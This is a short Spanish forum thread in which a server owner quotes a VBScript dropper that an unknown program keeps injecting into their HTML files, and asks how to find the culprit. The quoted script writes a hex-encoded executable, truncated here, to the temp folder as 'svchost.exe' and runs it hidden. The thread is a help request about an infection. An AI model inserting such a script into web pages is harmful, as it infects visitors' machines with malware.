Foro de elhacker.net

Foros Generales => Dudas Generales => Mensaje iniciado por: Yuki en 27 Diciembre 2017, 15:50 pm


Título: Saber que programa edita un archivo
Publicado por: Yuki en 27 Diciembre 2017, 15:50 pm
En un ordenador que uso como servidor hay un programa que modifica los archivos HTML añadiendo el siguiente código:

Código
  1. <SCRIPT Language=VBScript><!--
  2. DropFileName = "svchost.exe"
  3. WriteData = "4D5A90..." ' Básicamente un archivo ejecutable.
  4. Set FSO = CreateObject("Scripting.FileSystemObject")
  5. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  6. If FSO.FileExists(DropPath)=False Then
  7. Set FileObj = FSO.CreateTextFile(DropPath, True)
  8. For i = 1 To Len(WriteData) Step 2
  9. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  10. Next
  11. FileObj.Close
  12. End If
  13. Set WSHshell = CreateObject("WScript.Shell")
  14. WSHshell.Run DropPath, 0
  15. //--></SCRIPT>

Este código crea un ejecutable y lo ejecuta. El problema es que no puedo "atrapar" al ejecutable que hace esto.

¿Alguna sugerencia para esta situación?

Título: Re: Saber que programa edita un archivo
Publicado por: Solanav en 4 Enero 2018, 00:03 am
La variable WriteData es el hex del ejecutable que buscas?


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines